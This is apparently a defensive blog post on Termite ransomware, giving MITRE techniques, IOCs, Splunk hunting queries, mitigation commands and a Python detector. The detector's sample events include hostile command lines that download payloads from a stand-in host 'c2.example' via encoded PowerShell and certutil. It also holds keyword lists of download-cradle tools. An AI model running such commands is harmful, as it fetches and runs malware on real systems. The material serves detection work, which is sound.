Breaking Down Termite Ransomware: Infection Methods and Detections

Termite Ransomware has emerged as a significant threat, targeting supply-chain software providers and healthcare organizations. This article explores its MITRE ATT&CK tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs), along with detection strategies using Splunk.

You Should Know:

1. MITRE ATT&CK TTPs Used by Termite Ransomware

Termite employs several key techniques:

  • Initial Access: Phishing emails, exploit kits, or RDP brute-forcing.
  • Execution: PowerShell scripts, DLL sideloading, or scheduled tasks.
  • Persistence: Registry modifications (HKCU\Software\Microsoft\Windows\CurrentVersion\Run).
  • Defense Evasion: Process hollowing, obfuscated scripts.
  • Impact: File encryption with a custom extension (e.g., .termite), ransom notes.

Detection Command (Splunk SPL):

index=windows EventCode=4688 (ProcessName="*\\powershell.exe" OR ProcessName="*\\cmd.exe") CommandLine="* -enc *"

2. Behavioral Analysis & IOCs

  • File Creation Patterns (files carrying the custom extension from the Impact stage):
    find / -name "*.termite" -type f -exec ls -la {} \;
    
  • Network Traffic: C2 communication over HTTPS with unusual user-agents. The filter below flags cleartext HTTP on the TLS port by matching the bytes "GET " at the start of the TCP payload on port 443, where a TLS handshake is expected instead:
    tcpdump -i eth0 'port 443 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)'
    

3. Splunk Detection Rules

Use these SPL queries for hunting:

index=sysmon EventID=1 (CommandLine="*Invoke-WebRequest*" OR CommandLine="*certutil*")
index=wineventlog EventCode=4104 (ScriptBlockText="*AES*" OR ScriptBlockText="*RijndaelManaged*")
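The three hunts above (encoded PowerShell, download cradles, .NET crypto classes in script blocks) applied outside Splunk to a handful of constructed process-creation and script-block events, as an added example that is not part of the original post. The event field names, the "c2.example" host and the sample command lines are assumptions made for the example; the encoded payload is decoded so the analyst sees what the -enc flag was hiding.

```python
import base64
import re

# Constructed sample events modelled on Windows 4688 / Sysmon 1 and PowerShell 4104
# records. Every value here is invented for the example.
ENCODED = base64.b64encode(
    "Invoke-WebRequest http://c2.example/termite.dll".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"EventCode": 4688, "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventCode": 4688, "ProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -split -f http://c2.example/x.bin x.bin"},
    {"EventCode": 4104, "ScriptBlockText": "$aes = New-Object System.Security.Cryptography.RijndaelManaged"},
    {"EventCode": 4688, "ProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

CRADLES = ("invoke-webrequest", "certutil", "downloadstring")
CRYPTO = ("aes", "rijndaelmanaged")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a long base64 token rather than the literal "-enc".
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect(events):
    """Run the three hunts over a list of events; returns (rule, detail) tuples."""
    alerts = []
    for ev in events:
        code = ev.get("EventCode")
        if code == 4688:
            proc = ev.get("ProcessName", "").lower()
            cmd = ev.get("CommandLine", "")
            if proc.endswith(("powershell.exe", "cmd.exe")):
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    alerts.append(("encoded_powershell", decoded))   # hunt 1
                    cmd = cmd + " " + decoded    # also inspect the decoded text below
                if any(c in cmd.lower() for c in CRADLES):
                    alerts.append(("download_cradle", ev["CommandLine"]))   # hunt 2
        elif code == 4104:
            if any(k in ev.get("ScriptBlockText", "").lower() for k in CRYPTO):
                alerts.append(("crypto_scriptblock", ev["ScriptBlockText"]))   # hunt 3
    return alerts
```

Note that the first event fires both hunt 1 and hunt 2: the cradle is only visible after decoding, which is why the SPL match on "-enc" alone is worth keeping even when the command line shows no obvious download.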

4. Mitigation Steps

  • Patch Management: Ensure systems are updated.
    sudo apt update && sudo apt upgrade -y   # Linux
    
  • Disable RDP if Unused:
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 1 
    
  • Enable Logging:
    auditpol /set /category:"Detailed Tracking" /success:enable /failure:enable 
    

What Undercode Says:

Termite Ransomware follows a well-known attack chain but introduces new evasion tactics. Organizations must enhance endpoint monitoring, restrict PowerShell usage, and implement strict RDP policies. Proactive threat hunting using Splunk or similar SIEMs is crucial.

Prediction:

Future variants may incorporate AI-driven evasion or exploit zero-day vulnerabilities in supply-chain software.

Expected Output:

  • Detected suspicious PowerShell execution.
  • Identified Termite-related IOCs in logs.
  • Blocked C2 communication via firewall rules.

Reference: Splunk Blog on Termite Ransomware

Reported By: Teoderickc Breaking – Hackers Feeds